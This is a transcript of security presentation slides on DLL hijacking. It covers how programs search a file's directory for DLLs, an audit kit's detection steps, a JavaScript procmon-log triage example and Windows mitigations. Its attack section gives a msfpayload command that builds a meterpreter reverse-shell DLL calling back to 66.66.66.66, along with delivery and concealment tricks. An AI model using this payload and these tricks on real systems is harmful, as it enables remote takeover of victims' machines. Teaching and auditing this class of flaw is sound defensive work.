DLL hijacking
Uploaded by antitree
Category: Technology
Transcript of DLL hijacking
How To Become a Hijacking Terrorist
DLL Hijacking for fun and profit
DLL Hijacking Overview
DLL Hijacking: trick a program into loading a malicious DLL instead of the legitimate one
HDM found that when a file associated with a program is opened, the program looks in the directory of that file for the DLLs it references before looking in the correct location alongside the associated executable
PCAP Example - Normal
PCAP Example - Hijacked
DLL Hijacking
Old trick – new dog: Linux removed “.” from $PATH
Client side, WebDAV, or remote SMB share
Widely exploitable
Easy to detect
DLLHijackAuditKit
Automates the detection
Generates test scenarios for each file extension and automatically creates an exploitable file
Searches every extension
Demo
Audit.js
Download procmon from Sysinternals
Open procmon and filter for operations that begin with "IRP_MJ_" or "FASTIO_"
Use WMI to query the local system and find all the file extensions it can handle
Generate a test case for each file extension: make a dummy file containing the word “Howdy…” named after the extension being tested
Automatically open each file from the command line
While opening, log file system activity in procmon
Wait a few seconds, then close the program and try the next file
When all files are done, save the procmon log as LogFile.csv. This log file will show the executable associated with each file that was opened and the paths where it looked for DLLs.
Analyze.js
Parses LogFile.csv for each executable and the DLL it was looking for (e.g. wireshark.exe and airpcap.dll)
Generates a test scenario and copies in a dummy DLL named after the real DLL being searched for
Runs the file again; if the hijack succeeds, the dummy DLL creates a text file named exploit.txt
Repeat this step for each EXE/DLL pair to verify which are actively exploitable
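The Analyze.js step above boils down to reading the procmon export and keeping only failed DLL lookups that fall outside the Windows and Program Files directories. The following is an added example (not code from DLLHijackAuditKit) of that triage as a Node.js script; the CSV column layout and the sample rows are constructed to mirror a procmon export, and the audited program (wireshark.exe looking for airpcap.dll) is the page's own case.

```javascript
// Added example: triage a procmon LogFile.csv export for EXE/DLL pairs where a
// program searched the opened document's directory for a DLL that was not there.
// The column layout and the sample rows below are constructed, not a real capture.

// Directories where a failed lookup is expected and not a hijack opportunity.
const SYSTEM_DIRS = [/^c:\\windows\\/i, /^c:\\program files( \(x86\))?\\/i];

// Minimal CSV row splitter: procmon quotes every field and does not embed quotes.
function splitCsv(line) {
  return line.split('","').map((f) => f.replace(/^"|"$/g, ''));
}

// Returns unique { exe, dll, dir } entries for failed DLL opens outside system dirs.
// Accepts both the default "CreateFile" label and the low-level IRP_MJ_CREATE label
// that the kit's procmon filter ("IRP_MJ_" / "FASTIO_") produces.
function findCandidateLoads(csvText) {
  const rows = csvText.trim().split(/\r?\n/).map(splitCsv);
  const header = rows.shift();
  const col = (name) => header.indexOf(name);
  const [iProc, iOp, iPath, iRes] = ['Process Name', 'Operation', 'Path', 'Result'].map(col);
  const seen = new Set();
  const hits = [];
  for (const r of rows) {
    const path = r[iPath] || '';
    if (!/^(CreateFile|IRP_MJ_CREATE)$/.test(r[iOp]) || r[iRes] !== 'NAME NOT FOUND') continue;
    if (!/\.dll$/i.test(path)) continue;
    if (SYSTEM_DIRS.some((re) => re.test(path))) continue;
    const cut = path.lastIndexOf('\\');
    const dll = path.slice(cut + 1).toLowerCase();
    const key = `${r[iProc].toLowerCase()}|${dll}`;
    if (seen.has(key)) continue; // report each EXE/DLL pair once
    seen.add(key);
    hits.push({ exe: r[iProc], dll, dir: path.slice(0, cut) });
  }
  return hits;
}

// Constructed sample in procmon's CSV export layout (one hit, three non-hits).
const SAMPLE_LOG = [
  '"Time of Day","Process Name","PID","Operation","Path","Result","Detail"',
  '"1:02:03.1","wireshark.exe","1234","CreateFile","C:\\Users\\demo\\Desktop\\airpcap.dll","NAME NOT FOUND","Desired Access: Read"',
  '"1:02:03.2","wireshark.exe","1234","CreateFile","C:\\Windows\\System32\\airpcap.dll","NAME NOT FOUND","Desired Access: Read"',
  '"1:02:03.3","wireshark.exe","1234","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read"',
  '"1:02:03.4","wireshark.exe","1234","CreateFile","C:\\Users\\demo\\Desktop\\capture.pcap","SUCCESS","Desired Access: Read"',
].join('\n');

for (const h of findCandidateLoads(SAMPLE_LOG)) {
  console.log(`${h.exe} searched ${h.dir} for ${h.dll}`);
}
```

Run it against a real export from the audit run to get the list of pairs that still need the dummy-DLL confirmation step the kit performs.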
Real World Attack Scenario
Generate Payload:
msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dll
Rename to the DLL that the EXE is looking for
Put the DLL in the same folder as a file with an associated extension
Deliver file and DLL
Tricks
Use the Hidden attribute
Obfuscate with lots of other files
MSFEncode the payload
Create a link to a subfolder
Road Apples
Host a SMB share on the net!
Create a WebDAV share
Mitigation
Admins: Microsoft tool to catch illegal DLL references: http://support.microsoft.com/kb/2264107 (CWDIllegalInDllSearch registry key)
Disable WebDAV
Disable outbound SMB (ports 139, 445)
Developers: load DLLs securely
References
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://blog.metasploit.com/2010/08/better-faster-stronger.html
0day (AFAIK)
RDP .dll